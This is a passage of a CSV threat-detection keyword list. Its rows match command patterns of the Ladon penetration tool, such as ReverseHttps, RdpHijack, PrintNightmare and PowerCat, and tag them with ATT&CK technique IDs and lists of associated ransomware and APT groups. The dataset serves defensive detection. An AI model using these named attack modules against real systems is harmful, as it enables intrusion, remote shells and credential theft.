BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50734"
"*Ladon GetSystem*",".{0,1000}Ladon\sGetSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50735"
"*Ladon IISdoor*",".{0,1000}Ladon\sIISdoor.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50736"
"*Ladon IISpwd*",".{0,1000}Ladon\sIISpwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50737"
"*Ladon MssqlCmd *",".{0,1000}Ladon\sMssqlCmd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50738"
"*Ladon netsh *",".{0,1000}Ladon\snetsh\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50739"
"*Ladon noping *",".{0,1000}Ladon\snoping\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50740"
"*Ladon Open3389*",".{0,1000}Ladon\sOpen3389.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50741"
"*Ladon PowerCat *",".{0,1000}Ladon\sPowerCat\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50742"
"*Ladon PrintNightmare*",".{0,1000}Ladon\sPrintNightmare.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50743"
"*Ladon psexec*",".{0,1000}Ladon\spsexec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50744"
"*Ladon QueryAdmin*",".{0,1000}Ladon\sQueryAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50745"
"*Ladon RdpHijack*",".{0,1000}Ladon\sRdpHijack.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50746"
"*Ladon ReadFile *",".{0,1000}Ladon\sReadFile\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50747"
"*Ladon RegAuto*",".{0,1000}Ladon\sRegAuto.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50748"
"*Ladon ReverseHttps*",".{0,1000}Ladon\sReverseHttps.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 